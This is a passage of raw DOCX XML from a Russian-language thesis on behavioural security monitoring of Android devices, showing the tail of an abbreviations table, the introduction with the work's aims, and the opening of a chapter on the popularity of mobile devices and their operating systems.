      </w:tr>
      <w:tr w:rsidR="00B33563" w:rsidTr="006E1540">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5097" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00B33563" w:rsidRPr="00096345" w:rsidRDefault="00096345" w:rsidP="006E1540">
            <w:pPr>
              <w:pStyle w:val="14"/>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>IDE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5098" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00B33563" w:rsidRDefault="007343EE" w:rsidP="006E1540">
            <w:pPr>
              <w:pStyle w:val="14"/>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="007343EE">
              <w:t>Integrated development environment</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B33563" w:rsidTr="006E1540">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5097" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00B33563" w:rsidRDefault="008B2148" w:rsidP="006E1540">
            <w:pPr>
              <w:pStyle w:val="14"/>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>ПЗУ</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5098" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00B33563" w:rsidRDefault="007343EE" w:rsidP="006E1540">
            <w:pPr>
              <w:pStyle w:val="14"/>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>Постоянное запоминающее устройство</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B33563" w:rsidTr="006E1540">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5097" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00B33563" w:rsidRDefault="008B2148" w:rsidP="006E1540">
            <w:pPr>
              <w:pStyle w:val="14"/>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>ОЗУ</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5098" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00B33563" w:rsidRDefault="007343EE" w:rsidP="006E1540">
            <w:pPr>
              <w:pStyle w:val="14"/>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>Оперативное запоминающее устройство</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B33563" w:rsidTr="006E1540">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5097" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00B33563" w:rsidRPr="00F622DF" w:rsidRDefault="00F622DF" w:rsidP="006E1540">
            <w:pPr>
              <w:pStyle w:val="14"/>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>HTTP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5098" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00B33563" w:rsidRPr="007343EE" w:rsidRDefault="007343EE" w:rsidP="006E1540">
            <w:pPr>
              <w:pStyle w:val="14"/>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007343EE">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>HyperText Transfer Protocol</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B33563" w:rsidTr="0016468A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5097" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00B33563" w:rsidRPr="00F622DF" w:rsidRDefault="00F622DF" w:rsidP="0016468A">
            <w:pPr>
              <w:pStyle w:val="14"/>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>SSL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5098" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00B33563" w:rsidRDefault="007343EE" w:rsidP="0016468A">
            <w:pPr>
              <w:pStyle w:val="14"/>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="007343EE">
              <w:t>Secure Sockets Layer</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00766209" w:rsidTr="0016468A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5097" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00766209" w:rsidRDefault="00766209" w:rsidP="0016468A">
            <w:pPr>
              <w:pStyle w:val="14"/>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>JSON</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5098" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00766209" w:rsidRDefault="007343EE" w:rsidP="0016468A">
            <w:pPr>
              <w:pStyle w:val="14"/>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="007343EE">
              <w:t>JavaScript Object Notation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00766209" w:rsidTr="0016468A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5097" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00766209" w:rsidRPr="00766209" w:rsidRDefault="00766209" w:rsidP="0016468A">
            <w:pPr>
              <w:pStyle w:val="14"/>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>GPS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5098" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00766209" w:rsidRDefault="007343EE" w:rsidP="0016468A">
            <w:pPr>
              <w:pStyle w:val="14"/>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="007343EE">
              <w:t>Global Positioning System</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00961B7B" w:rsidTr="0016468A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5097" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00961B7B" w:rsidRDefault="00961B7B" w:rsidP="0016468A">
            <w:pPr>
              <w:pStyle w:val="14"/>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>VPN</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5098" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00961B7B" w:rsidRDefault="007343EE" w:rsidP="0016468A">
            <w:pPr>
              <w:pStyle w:val="14"/>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="007343EE">
              <w:t>Virtual Private Network</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00751156" w:rsidTr="0016468A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5097" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00751156" w:rsidRPr="007343EE" w:rsidRDefault="007343EE" w:rsidP="007343EE">
            <w:pPr>
              <w:pStyle w:val="14"/>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>SMS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5098" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00751156" w:rsidRDefault="007343EE" w:rsidP="0016468A">
            <w:pPr>
              <w:pStyle w:val="14"/>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="007343EE">
              <w:t>Short Message Service</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00751156" w:rsidTr="0016468A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5097" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00751156" w:rsidRPr="00751156" w:rsidRDefault="00751156" w:rsidP="0016468A">
            <w:pPr>
              <w:pStyle w:val="14"/>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>SSID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5098" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00751156" w:rsidRPr="007343EE" w:rsidRDefault="007343EE" w:rsidP="0016468A">
            <w:pPr>
              <w:pStyle w:val="14"/>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007343EE">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Service Set Identifier</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00751156" w:rsidTr="0016468A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5097" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00751156" w:rsidRDefault="00751156" w:rsidP="0016468A">
            <w:pPr>
              <w:pStyle w:val="14"/>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>BSSID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5098" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00751156" w:rsidRDefault="007343EE" w:rsidP="0016468A">
            <w:pPr>
              <w:pStyle w:val="14"/>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Basic </w:t>
            </w:r>
            <w:r w:rsidRPr="007343EE">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Service Set Identifier</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A22B75" w:rsidTr="0016468A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5097" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00A22B75" w:rsidRDefault="00A22B75" w:rsidP="0016468A">
            <w:pPr>
              <w:pStyle w:val="14"/>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>ORM</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5098" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00A22B75" w:rsidRDefault="00A22B75" w:rsidP="0016468A">
            <w:pPr>
              <w:pStyle w:val="14"/>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A22B75">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Object-Relational Mapping</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="009D41FE" w:rsidRDefault="009D41FE">
      <w:pPr>
        <w:widowControl/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="851"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00753BE3" w:rsidRDefault="00753BE3" w:rsidP="00E70973">
      <w:pPr>
        <w:pStyle w:val="110"/>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="_Toc61505520"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>ВВЕДЕНИЕ</w:t>
      </w:r>
      <w:bookmarkEnd w:id="12"/>
    </w:p>
    <w:p w:rsidR="00753BE3" w:rsidRDefault="00753BE3" w:rsidP="00753BE3">
      <w:pPr>
        <w:pStyle w:val="14"/>
      </w:pPr>
      <w:r>
        <w:t>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колоссального технического прорыва в сфере мобильных устройств, ведь сейчас они уже могут составить конкуренцию даже современным компьютерам.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00753BE3" w:rsidRDefault="00753BE3" w:rsidP="00753BE3">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753BE3" w:rsidRDefault="00753BE3" w:rsidP="00753BE3">
      <w:pPr>
        <w:pStyle w:val="14"/>
      </w:pPr>
      <w:r>
        <w:t>Большинство компаний используют современные технические средства для решения поставленных перед ними бизнес задач. Так, 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F61C61" w:rsidRDefault="00F61C61" w:rsidP="00753BE3">
      <w:pPr>
        <w:pStyle w:val="14"/>
      </w:pPr>
      <w:r>
        <w:t>Однако в современной организации необходимо контролировать не только вредоносную активность компьютерных вирусов и вредоносного ПО, но и вредоносные или негативно влияющие на корпорацию действия, исходящие от самих пользователей устройств.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00753BE3" w:rsidRDefault="00753BE3" w:rsidP="00753BE3">
      <w:pPr>
        <w:pStyle w:val="14"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">На рынке технических сервисов существуют системы и целые комплексы обеспечения безопасности, но большинство из них используют </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>средства и способы, сильно ограничивающие процесс использования мобильного устройства пользователем.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00753BE3" w:rsidRDefault="00753BE3" w:rsidP="00753BE3">
      <w:pPr>
        <w:pStyle w:val="14"/>
      </w:pPr>
      <w:r>
        <w:t>Все это делает мобильные устройства привлекательной целью для злоумышленников, желающих выкрасть денежные средства или получить доступ к персональным данным или коммерческим тайнам.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00753BE3" w:rsidRDefault="00753BE3" w:rsidP="00753BE3">
      <w:pPr>
        <w:pStyle w:val="14"/>
      </w:pPr>
      <w:r>
        <w:t>Ввиду этого, важным аспектом эксплуатирования подобных устройств является обеспечение их безопасности, мониторинг их функционирования с целью предотвращения разного рода утечек информации.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00753BE3" w:rsidRDefault="00753BE3" w:rsidP="00753BE3">
      <w:pPr>
        <w:pStyle w:val="14"/>
      </w:pPr>
      <w:r>
        <w:t>В рамках данной работы будут рассмотрены наиболее популярные на текущий момент операционные системы мобильных устройств. Будет проведен анализ существующих средств мониторинга и обеспечения безопасности мобильных устройств на операционной системе андроид. Приведена их критика, а также разработано и реализовано собственное решение данной проблемы современных мобильных устройств.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00753BE3" w:rsidRDefault="00753BE3" w:rsidP="00753BE3">
      <w:pPr>
        <w:pStyle w:val="14"/>
      </w:pPr>
      <w:r>
        <w:t>Актуальность данной работы заключается в том, что большинство мобильных устройств на сегодняшний день не обладают дополнительными средствами защиты их целостности и конфиденциальности хранящихся на них данных. А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753BE3" w:rsidRDefault="00753BE3" w:rsidP="00753BE3">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753BE3" w:rsidRDefault="00753BE3" w:rsidP="00753BE3">
      <w:pPr>
        <w:pStyle w:val="14"/>
      </w:pPr>
      <w:r>
        <w:t>Задачи работы:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00753BE3" w:rsidRDefault="00753BE3" w:rsidP="00753BE3">
      <w:pPr>
        <w:pStyle w:val="a0"/>
      </w:pPr>
      <w:r w:rsidRPr="00D600A4">
        <w:t>провести анализ существующих ОС МПУ с последующим выбором целевой ОС</w:t>
      </w:r>
      <w:r>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00753BE3" w:rsidRPr="00206016" w:rsidRDefault="00753BE3" w:rsidP="00753BE3">
      <w:pPr>
        <w:pStyle w:val="a0"/>
      </w:pPr>
      <w:r w:rsidRPr="00206016">
        <w:t>выделить набор необходимых параметров для мониторинга;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00753BE3" w:rsidRPr="00206016" w:rsidRDefault="00753BE3" w:rsidP="00753BE3">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753BE3" w:rsidRPr="00206016" w:rsidRDefault="00753BE3" w:rsidP="00753BE3">
      <w:pPr>
        <w:pStyle w:val="a0"/>
      </w:pPr>
      <w:r>
        <w:t>реализовать</w:t>
      </w:r>
      <w:r w:rsidRPr="00206016">
        <w:t xml:space="preserve"> средство для поведенческого мониторинга мобильных устройств.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00753BE3" w:rsidRDefault="00753BE3" w:rsidP="00753BE3">
      <w:pPr>
        <w:pStyle w:val="14"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Объект исследования – ОС компонентов мобильного сегмента ИТКС.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00753BE3" w:rsidRDefault="00753BE3" w:rsidP="00753BE3">
      <w:pPr>
        <w:pStyle w:val="14"/>
      </w:pPr>
      <w:r>
        <w:t>Предмет исследования – способы и методы контроля и поведенческого анализа мобильных персональных устройств.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009453D3" w:rsidRDefault="009453D3" w:rsidP="00753BE3">
      <w:pPr>
        <w:pStyle w:val="14"/>
      </w:pPr>
      <w:r>
        <w:t>В первой главе будет рассмотрена актуальность проблемы защищенности мобильных устройств. П</w:t>
      </w:r>
      <w:r w:rsidR="00753BE3">
        <w:t>роанализированы наиболее популярные операционные с</w:t>
      </w:r>
      <w:r>
        <w:t>истемы для МПУ и обоснован выбор целевой операционной системы.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009453D3" w:rsidRDefault="009453D3" w:rsidP="009453D3">
      <w:pPr>
        <w:pStyle w:val="14"/>
      </w:pPr>
      <w:r>
        <w:t>Во второй главе будут рассмотрены существую</w:t>
      </w:r>
      <w:r w:rsidRPr="009453D3">
        <w:t>щие методы анализа безопасности мобильных персональных устройств</w:t>
      </w:r>
      <w:r w:rsidR="00FB15D4">
        <w:t>, и</w:t>
      </w:r>
      <w:r w:rsidR="003830E4">
        <w:t xml:space="preserve">сследованы существующие решения проведения поведенческого анализа мобильных устройств на ОС андроид, </w:t>
      </w:r>
      <w:r>
        <w:t>выделены их слабые и сильные стороны,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753BE3" w:rsidRPr="009453D3" w:rsidRDefault="00753BE3" w:rsidP="00753BE3">
      <w:pPr>
        <w:pStyle w:val="14"/>
      </w:pPr>
      <w:r w:rsidRPr="009453D3">
        <w:t xml:space="preserve">Во </w:t>
      </w:r>
      <w:r w:rsidR="009453D3" w:rsidRPr="009453D3">
        <w:t>третьей</w:t>
      </w:r>
      <w:r w:rsidRPr="009453D3">
        <w:t xml:space="preserve"> главе работы будет выбран необходимый набор технологий, разработано и реализовано средство проведения поведенческого анализа функционирования мобильных устройств на операционных системах андроид, альтернативное существующим.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00753BE3" w:rsidRPr="009453D3" w:rsidRDefault="00753BE3" w:rsidP="00753BE3">
      <w:pPr>
        <w:pStyle w:val="14"/>
      </w:pPr>
      <w:r w:rsidRPr="009453D3">
        <w:t xml:space="preserve">В </w:t>
      </w:r>
      <w:r w:rsidR="009453D3" w:rsidRPr="009453D3">
        <w:t>четвертой</w:t>
      </w:r>
      <w:r w:rsidRPr="009453D3">
        <w:t xml:space="preserve"> главе будут рассчитаны показатели экономической эффективности при внедрении разработанного программного обеспечения.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00753BE3" w:rsidRPr="007F0C6F" w:rsidRDefault="00753BE3" w:rsidP="00753BE3">
      <w:pPr>
        <w:pStyle w:val="14"/>
      </w:pPr>
      <w:r w:rsidRPr="009453D3">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9D41FE" w:rsidRDefault="009D41FE">
      <w:pPr>
        <w:widowControl/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="851"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="002925D2" w:rsidRDefault="00FE7F61" w:rsidP="00F054DE">
      <w:pPr>
        <w:pStyle w:val="11"/>
      </w:pPr>
      <w:bookmarkStart w:id="13" w:name="_Toc61505521"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>ИССЛЕДОВАТЕЛЬСКИЙ РАЗДЕЛ</w:t>
      </w:r>
      <w:bookmarkEnd w:id="13"/>
    </w:p>
    <w:p w:rsidR="000853C0" w:rsidRPr="00822323" w:rsidRDefault="000853C0" w:rsidP="00822323">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="14" w:name="_Toc61505522"/>
      <w:r w:rsidRPr="00822323">
        <w:t>Актуальност</w:t>
      </w:r>
      <w:r w:rsidR="00822323">
        <w:t>ь проблемы</w:t>
      </w:r>
      <w:bookmarkEnd w:id="14"/>
    </w:p>
    <w:p w:rsidR="00A01A70" w:rsidRDefault="004926CC" w:rsidP="00A66119">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передачи данных, навигации и прочего.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A01A70" w:rsidRDefault="00A01A70" w:rsidP="00124ABE">
      <w:pPr>
        <w:pStyle w:val="14"/>
      </w:pPr>
      <w:r>
        <w:t>Если обратитьс</w:t>
      </w:r>
      <w:r w:rsidR="00E37904">
        <w:t>я к статистике, представленной на</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E37904">
        <w:t>рисун</w:t>
      </w:r>
      <w:r>
        <w:t>к</w:t>
      </w:r>
      <w:r w:rsidR="00E37904">
        <w:t>е</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 1, то начиная с 2012 года замечен резкий рост популярности мобильных устройств и такой же резкий спад популяр</w:t>
      </w:r>
      <w:r w:rsidR="00124ABE">
        <w:t>ности персональных компьютеров.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A311F6" w:rsidRDefault="00D6194F" w:rsidP="00A311F6">
      <w:pPr>
        <w:pStyle w:val="ac"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6D559F0D" wp14:editId="4BC31742">
            <wp:extent cx="5819775" cy="3032125"/>
            <wp:effectExtent l="0" t="0" r="952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4ABE" w:rsidRDefault="00A311F6" w:rsidP="00124ABE">
      <w:pPr>
        <w:pStyle w:val="aff4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Рисунок </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> SEQ Рисунок \* ARABIC </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00A22B75">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> – Темпы роста популярности ПК и МПУ</w:t>
      </w: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Вызвана такая динамика тем, что большинство мобильных устройств уже много лет справляются с задачами, которые были всегда возложены на персональные компьютеры, ничуть не хуже, как, например, редактирование текстовых файлов, а иногда даже лучше, чем компьютеры.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A01A70" w:rsidRDefault="00A01A70" w:rsidP="00A01A70">
      <w:pPr>
        <w:pStyle w:val="14"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">В добавок неоспоримым преимуществом мобильных устройств является </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>простота их транспортировки, ввиду их веса и габаритов.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00990622" w:rsidRDefault="00990622" w:rsidP="00124ABE">
      <w:pPr>
        <w:pStyle w:val="14"/>
      </w:pPr>
      <w:r>
        <w:t>Если рассмотреть актуальное состояние популярности этих устройств, то на рисунке 2 видно, что мобильные устройства не перестают уступать в популярности современным компьютерам и остаются на лидирующих позициях.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A311F6" w:rsidRDefault="00D6194F" w:rsidP="00A311F6">
      <w:pPr>
        <w:pStyle w:val="ac"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="138B8BD2" wp14:editId="7D8916FE">
            <wp:extent cx="5715000" cy="33432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90622" w:rsidRPr="00124ABE" w:rsidRDefault="00A311F6" w:rsidP="00124ABE">
      <w:pPr>
        <w:pStyle w:val="aff4"/>
      </w:pPr>
      <w:r w:rsidRPr="00124ABE">
        <w:t xml:space="preserve">Рисунок </w:t>
      </w:r>
      <w:r w:rsidRPr="00124ABE">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00124ABE">
        <w:instrText xml:space="preserve"> SEQ Рисунок \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00124ABE">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00A22B75">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00124ABE">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00124ABE">
        <w:t xml:space="preserve"> – Темпы роста популярности мобильных устройств и персональных компьютеров в 2020 году</w:t>
      </w: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t xml:space="preserve">Хоть и целевой аудиторией использования мер обеспечения ИБ МПУ являются корпорации, с намерением контроля целостности и конфиденциальности коммерческой информации, стоит отметить что немаловажным является обеспечение контроля действий самого пользователя, </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>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 динамический (поведенческий) [1].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 позволяющие украсть деньги. [2]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000853C0" w:rsidRDefault="000853C0" w:rsidP="00A66119">
      <w:pPr>
        <w:pStyle w:val="14"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Для решения этой проблемы, многие компании используют разные способы анализа защищенности своего приложения. Так, например, компания Smart Security предлагает использовать метод поведенческой биометрии, </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>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 к нему получило стороннее лицо. [3]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000853C0" w:rsidRDefault="000853C0" w:rsidP="00687DF7">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="15" w:name="_Toc61505523"/>
      <w:r w:rsidRPr="00DF2615">
        <w:t>Анализ современных мобильных</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ОС</w:t>
      </w:r>
      <w:bookmarkEnd w:id="15"/>
    </w:p>
    <w:p w:rsidR="000853C0" w:rsidRDefault="000853C0" w:rsidP="00A66119">
      <w:pPr>
        <w:pStyle w:val="14"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Мобильные устройства начали развиваться заметно позже </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>стацио-нарных</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">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124ABE">
      <w:pPr>
        <w:pStyle w:val="14"/>
      </w:pPr>
      <w:r>
        <w:t>Проанализируем темп роста популярности ОС для ПК и МПУ, чья статистика распространения со временем представлена на рисунке 3.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A311F6" w:rsidRDefault="00D6194F" w:rsidP="00A311F6">
      <w:pPr>
        <w:pStyle w:val="ac"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
